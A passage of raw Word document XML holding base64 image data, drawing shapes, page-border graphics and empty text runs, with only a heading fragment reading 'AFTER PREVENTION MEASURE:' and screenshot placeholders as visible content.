Z1q01q++J32Xw/p+ieWml7/7OkuP3n/H5/wA9JJK/RCs+30bS9Fupb21sLa0nu/L82a2t&#10;kR5v9/1rQoA4/wCJGqf8Sv8AsK1gkvta1aOS3t7aP/ln/wBPEn/POOOpNb0vXfFtvbabqMFjY2X2&#10;y3uLiS2u5LiT93J5nl/6uP8A5aeXXUtZwrcvOsSi5lXyHk/2PSmUAFcZ8Y4o5fA8nn+X5cep6fJ5&#10;ckckn2jy7y3k8vy445JJPM8vy/8AV13NFAHlGia9puqeLNBjg8Pf2RJHcSSfaZNI1C38z/R7j935&#10;klnHH/5Ere+ENhBpfhO5jtY/Kj/trVP3f/cQuI//AGnXabm9al/i2/welAHF/Fb/AJFay/7Dej/+&#10;nG3qT4N/8kj8F7P+Wmi2f/pPHW5r+k2Ws2cVpfpJJGk0F1+6fZ88TpMn/j8SH8Kd4f0e00HQtM0r&#10;T4zHY2MKWtvHK5fYkUWxBQB5JpNh4kv/APhFI7XSdS0iOw0i3068uZI445P+Piz8zy5P9Z5flx3F&#10;Z1zo3jfS/HF7fpBqv9nSWn2KO5sfLkufMjuLz7PJJ5kn7yOOOSPzP+enmR/9NK9+qGgDnvh3dX91&#10;4bjk1GwutMufMk/d31x5kn/XSuhoooAmooooAhqaiigAqGpqKAIaKKmoAxfFv/IKtv8Ar/s//SiO&#10;sn4O/wDJH/A3/YBs/wD0njrpZ4YtSiiSWMnYyT/fP34pd6Gq/h/RLLw7oemaLpqtHp1jAljbxyHO&#10;yOKLYn/oAoA06+cvhxD4a+KGteKvBGu6nZaVpGk+I9TvNT0qSeOB9ZeS5k+zkjP+rj8vt/0zr6Hr&#10;HuPCvh7Ubt5LrQ9OuJ5ZPMd5rNH/AJ1y1qMqhw4qjKuec+A/EmlJ8V4PAdndR6zN4X028jg1RZY5&#10;d9m8lm8cbyf34/8AV/8AbOvZKzNL8P6J4fmlbT9JsbGZ4/L8y1s40q7ToQ9nC8wwtKdCBxnxo0vU&#10;tZ+F/iK00jzP7R+z+ZH5f/LT955kkf8A37r5E+G/xQ8J6Xpl7oWtpJpGvR3/AJkepSW8kkclv5f+&#10;r/d193VQk0fR/wC0Pt/9m2v2z/WfavsyeZX0+AzKnPA1MIoc3P2908PNMlp5hX9vU/wFXwLF5XhP&#10;Tf3kkvmW8cn7yPy5P3n/AEzrfoor52EPZQ5IH0tOn9Xp+z/kPnP4yappmh/FP7ffaFpet/6JHHJb&#10;atYR3H7v/tp/q6h8J+JPB/iT4gaDJpHhHQdAlSf5I7Oxt45P+/nl+ZX0lRX139pU/q/I8Pr/AIj4&#10;ieTV6mJ5/rPuc/P8IVgfEj/kn/ib/sGXn/ouSt+vP/HHxf0Dwjqb6TqljdXRmBRxFbpJHtfqMSSV&#10;4eDUniISgfb4itTwseatK8D5N+G/xY0LwxY6NZW2ozW6WH+mTy+R5kc9/J+78ySP/nnbx/6uvpH9&#10;m7xFH4stvF+qxu8kV3q0lxHJJWTF8Vvhon/Mof8AlMt//jlamnfH3wTokDrZaNf2UMv347WygT/2&#10;pX3Gc5xhcZh5wjRfPPrdf4jw/wDY/rdOvTa+5ntFcv4/1mTQfD9zqUFpHcy28fmRxyV0F5eJY2c8&#10;778Qp5gEZxXlf/DSHhv/AJ8NV/79x/8AxyvzXE5e8fD2U480D2KmYU8Ir8zjPyNHw34o1268SW2m&#10;6paWltHcWn22OS2kk/56f6uvRpK8o/4aQ8N/8+Gq/wDfuP8A+OVteEvjFo3jDU5LW0gv4SkPn7ri&#10;FDz+ElYYPJVl7nKjTUYepl/a1DEKFGdRyn6He/7FfCHxE8G+JdB0O5tL3wnJF9o1qS4t9SjsI5JP&#10;L/55+ZH+8r7vo/5Z19Bl2ZxwFT4DpnD2h4d+z7pfiWLxJr2papHPFpNxbx+R5n7vzJK9xoqGpx2J&#10;+v1/bjpw9mcR8aPC+peLfB/9m6RYwXOoyXEfl3NzPJb/AGT/AKaV8765osvw11LWdK8QaV/aXiLU&#10;v3kHiffJJ5n/AEz/AHle5Xn7Qfh6xuJY3tNV3RvsYxxxjP8A5EqG4/aC8K3mzzdM1GbypN6eZBHx&#10;/wCRK9rL8ZiMv5IypqUPU+GzXB4PMpzlGs4T9Geh+Ev+RT0Xf/z6W/8A6LrQrz3QfjloHibXLXTY&#10;LXUobqT7ryRIUHO/p5lekV8zim41LzifXYGrTlh7U5c3qeF+IvHVl8Hfid4l1bV9NvrmbVntJLW9&#10;toI5I/s//LS3/eVa8D66nxT+KGn+KNItbu2srHTfsepXN1BHb/b5JP8AV/6v93XsN5YW+oQeXdQR&#10;XEP9yZN/86kjtY4YVCRpDDF9xI69+ea0J0GlD3+Xl8trG3sffErlfi1o2peI/h3rVhpf/H7JH5kc&#10;f/PTy5PM8uuqor5Sf7ymazi50+RHyf8AC7WZ7/xZp0FrqV9bR2lp9nu9E+zyf88/Lk/6Z/6z95/z&#10;0r6k0SKS10e2R/3Unl/6v/nnVoafatLLdR2lvHM//LbZ89Ory69Kax1LFYuqlyw5KfLHf+/L+8Vh&#10;1WpYOcMTPnnOfMTV87/tCXOj+E9cvfFHirwK/iTw7BYWcf8AaX7v/RP9IuI5I/8Anp/q7iP/ALaV&#10;7r4k1628MaJLqt3HNLbR+XujtyA5/ebOprzz/ho7w3/z46p/34i/+OV9hl86lGftuXm+djycwq4d&#10;r2NSo4z8kfDHwq+JX9ofGDwxBBB9mtrzxFbyRxx2/lxx+ZeV+m9edab+0BoOqXcdrHaakC/8UkUZ&#10;/wDaldvpWtRax5nkxvHs/wCehzXfnOOq5hyVHHl5DjyqOFw3PTpycucvV8N/ET4c/ELwH4b8T2n/&#10;AAl/2mT+07f+wb6SP/iY2FvJ9o+0Rxyf6zy/9X/q5K+rfF3xi0bwdfx2t5Bfzl4PP3W8SDn8ZKwz&#10;+0F4VurlJzpmotcw/ckeCM/+1K8/B0q9P95CKO3GYvCU5+wnUf3HS/BzQbvwv8L/AA5pOoySS3tp&#10;YRxySSf6yu0ryn/hovw3/wA+Oqf9+Yv/AI5Xo0OowzaPHfiNxC8fmdf3m3y+ma461GpB884/GdNH&#10;GUKy5KcnL1Pn/wDa98ZX/gjUPBd3a3c9tJJHqEf7ufy/M/dx+X5lfFem+LZ5ZLnVr3xDJcxyW8kd&#10;3ptzcSSSTySeZ/yzr751T48eBvEMcKX+g3l9t/1X2qygfZ/5Eqh/wsz4Xf8AQjp/4LLSr/s2v/Kv&#10;vPq8BxJhcBg4QhBc8Pe3f/yPl+J7Ron/ACB9O2R+V/o8f/ouvQNN/wCQfb/9c68W8D/FrQ/HOpyW&#10;OnWt3bSJB5/723SOPONnSOStG+/aS8NeHbyTSp9P1Wa5gfyDJHHGEI+nmVk8JWlPk5UfKVMfh2vb&#10;+0fJPyPmL4mf2t8PvHHiu0up7rSNWv7+S8t72OOT/S4/M/1fmR/9s69m/ZN+IGs+LtU1Kx1V/tX2&#10;ewt5PtUf/PT/AJ5yf9NK6G5/ah8Cax5JudC1S6Kyb4vtNpbvs/8AIlPs/wBp7wLpfnfZdF1W3LSb&#10;5fJtLdN/5SVvGhFYX6riaCnUjPmhO/wnzkK2IhifrP12Xsv5LP4T1/xJ/wAg+P8A66V8wftvXXiO&#10;1/Z+1iTwlYXep65Hc2/kRWNpJPJ/rP8AWeXXq+l/HbQPHlx9gsbTUrWdP3n76JBHtxsxgSH+/XLX&#10;n7Qnh7TbyWBrTVcxvsYxxxjP/kSsYYeu58nKj6KeOoU4+29o+T0Px01fwn8a/EcPl6p4H8UXy/6v&#10;zpfDUm//AL78qv3E8LRyReF9JjeOSKT7JH+7/wC2deff8NIeG/8Anw1X/v3H/wDHKv6B8ctA8Rav&#10;FpsFrqUM0n3fMiQxj8PMrSpg69P7KIhmuFqT5IVH9x6FRU1Q1xHpBU1Q0UATUUUUAFFFFAyGiipq&#10;AIaKKmoEFQ1NRQAVDU1FAyGipqhoEFTVDRQBNRRRQBDU1FFABXH6l4D/AOEo1S5vteu57mOOT/iW&#10;W1tcSW/2Dy4/9Z+7/wCXj/pp/wBs/wDnp5nYUUAZ3hu11K10e2g1eeO+vY/3clzH+7+0f9NP+mdf&#10;J/7X3wh+KXiu6uLX4d3X9m219suZ7mLfbyRyySfv445Ej8zrHFX13U1AHzH+yz8P/F/g7wh4U0bx&#10;dHdXviOw1O8uL/W7mOS4+0W8kdxHHH9ok/ef8tI/+WdereP/ADIvHGiyfb/7Mi/sTVLePUpJI444&#10;5PtGnyR/vJI5I/M/dyf8s/8AlnXoFTeZQB5rJrMf+rTVtHlj8uOPzJNTt/8Anp/170aJLHdePNOk&#10;g1KPU/8AkISf6NJHJ9njkkt/Lj/dxx/88/8Alp5n/XSSvSqKAOP+LWl3es/DPxHYadBJc3txaeXH&#10;HHH5nmV5b4k8EeKNUkvdd0G0nivbfw79i+zX1vHZ/b45JLjzLfy4/wDV/wCsjkj/AOmlfQVFAHj+&#10;m6NrWl+LLKN9FkubmTU/tFxq32SOSP7H5f7uPzP+Wckf+r//AHletUUUAcRrfhyOLxhrWupps9z9&#10;r0iS3k8v/SPM/efu4/Lkk/8AIf7usHwT4Dnl+H+o6bqOkyW1td/bP3f2iS3kk8y4kk/eW8f7uOvW&#10;6KAPF7nwRq0vjDwpJBaSf6Pb6fJd3NzYRyfZ/s/meZHHceZ+78zzPL8vy/8Av3+8r2iiigD5k/4K&#10;BfDHxR8XfgTbaH4R0WfXdR/tq3uPs1tJHHJ5flSeZ/rK/M62+EfjH4saxqOgeBvhxrCahphkj1aG&#10;+SzcwPn/AJ6fZ7fyq/cyo47SCGZykMcU1yd7SRp/rf8Af9aAPOf2a/DmpeDfgH4D0LWrSSx1Ww0i&#10;3t7u2l/5ZyeXXpVFFAGbZ/8AINsP+vdP5UU6x/5Bdh/17p/KigD/2VBLAwQUAAYACAAAACEAFNNG&#10;pd0AAAAFAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQUvDQBCF74L/YRnBm92k1dLGbEop6qkItoL0&#10;Nk2mSWh2NmS3SfrvHb3o5cHwhve+l65G26ieOl87NhBPIlDEuStqLg187l8fFqB8QC6wcUwGruRh&#10;ld3epJgUbuAP6nehVBLCPkEDVQhtorXPK7LoJ64lFu/kOotBzq7URYeDhNtGT6Nori3WLA0VtrSp&#10;KD/vLtbA24DDeha/9NvzaXM97J/ev7YxGXN/N66fQQUaw98z/OALOmTCdHQXLrxqDMiQ8KviLR+n&#10;MuNoYB4vZqCzVP+nz7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BSBJBpBBAAAjw8AAA4AAAAAAAAAAAAAAAAAPQIAAGRycy9lMm9Eb2MueG1sUEsBAi0ACgAAAAAA&#10;AAAhAHOeeaDZ2gAA2doAABQAAAAAAAAAAAAAAAAAqgYAAGRycy9tZWRpYS9pbWFnZTEuanBnUEsB&#10;Ai0AFAAGAAgAAAAhABTTRqXdAAAABQEAAA8AAAAAAAAAAAAAAAAAteEAAGRycy9kb3ducmV2Lnht&#10;bFBLAQItABQABgAIAAAAIQA3ncEYugAAACEBAAAZAAAAAAAAAAAAAAAAAL/iAABkcnMvX3JlbHMv&#10;ZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAGAAYAfAEAALDjAAAAAA==&#10;">
                <v:rect id="Rectangle 6845" o:spid="_x0000_s1413" style="position:absolute;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14:paraId="73D08910" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6846" o:spid="_x0000_s1414" style="position:absolute;left:59448;top:34098;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14:paraId="530071C1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6847" o:spid="_x0000_s1415" style="position:absolute;top:35744;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14:paraId="7C41B6B6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6848" o:spid="_x0000_s1416" style="position:absolute;top:37771;width:55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505C4C3A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 6859" o:spid="_x0000_s1417" type="#_x0000_t75" style="position:absolute;left:383;top:1862;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31xgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PSwMx&#10;FMTvgt8hPKE3m12lpd02LVUp9KLYP9vzY/PcLCYv6ybdrt/eCILHYWZ+wyzXg7Oipy40nhXk4wwE&#10;ceV1w7WC03F7PwMRIrJG65kUfFOA9er2ZomF9lfeU3+ItUgQDgUqMDG2hZShMuQwjH1LnLwP3zmM&#10;SXa11B1eE9xZ+ZBlU+mw4bRgsKVnQ9Xn4eIUvLzlMX/s7abE96+tOT/Z8rUvlRrdDZsFiEhD/A//&#10;tXdawXQ2mcPvm/QE5OoHAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA9Hmt9cYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId153" o:title=""/>
                </v:shape>
                <v:shape id="Shape 6860" o:spid="_x0000_s1418" style="position:absolute;left:256;top:1735;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i3wQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0L/kO4A+40VYdSOqYy+Bhc+gKZ3aW5fWBzU5poO39vFgMuD+e9Wg+mEU/qXG1ZwXwWgSDOra65&#10;VHC97KcJCOeRNTaWScEfOVhn49EKU217PtHz7EsRQtilqKDyvk2ldHlFBt3MtsSBK2xn0AfYlVJ3&#10;2Idw08hFFMXSYM2hocKWNhXl9/PDKNj1i5v/Pf7ck3lhdftZbnl5vCg1+Ri+v0B4Gvxb/O8+aAVx&#10;Eof94U14AjJ7AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANZpWLfBAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA44AC0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD4912D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D234A0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F39D0B0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1807E5BA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0204D8BB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251742208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="653E857B" wp14:editId="2A93BDF0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="44207" name="Group 4420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80" name="Shape 5018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1" name="Shape 5018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2" name="Shape 5018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3" name="Shape 5018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4" name="Shape 5018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07" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50185" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50186" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50187" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50188" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50189" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251743232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00EA7C81" wp14:editId="3EB70BF3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="44208" name="Group 44208"/>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190" name="Shape 5019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1" name="Shape 5019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2" name="Shape 5019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3" name="Shape 5019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4" name="Shape 5019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08" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50195" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50196" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50197" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50198" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50199" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480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AFTER PREVENTION MEASURE: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFB2E57" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="40" w:right="-182"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F522DC4" wp14:editId="5EB277E4">
                <wp:extent cx="5961558" cy="6789166"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="44206" name="Group 44206"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5961558" cy="6789166"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5961558" cy="6789166"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6929" name="Rectangle 6929"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5919216" y="3247517"/>
                            <a:ext cx="56314" cy="226001"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="16D023E9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="6930" name="Rectangle 6930"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5919216" y="6619240"/>
                            <a:ext cx="56314" cy="226002"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3F5EBD8D" w14:textId="77777777" w:rsidR="00F97B5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6934" name="Picture 6934"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId154"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="12700" y="12700"/>
                            <a:ext cx="5873750" cy="3329940"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="6935" name="Shape 6935"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5899150" cy="3355340"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5899150" h="3355340">
                                <a:moveTo>
                                  <a:pt x="0" y="3355340"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5899150" y="3355340"/>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937" name="Picture 6937"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId155"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="12700" y="3422651"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="6938" name="Shape 6938"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3409951"/>
                            <a:ext cx="5899150" cy="3329305"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5899150" h="3329305">
                                <a:moveTo>
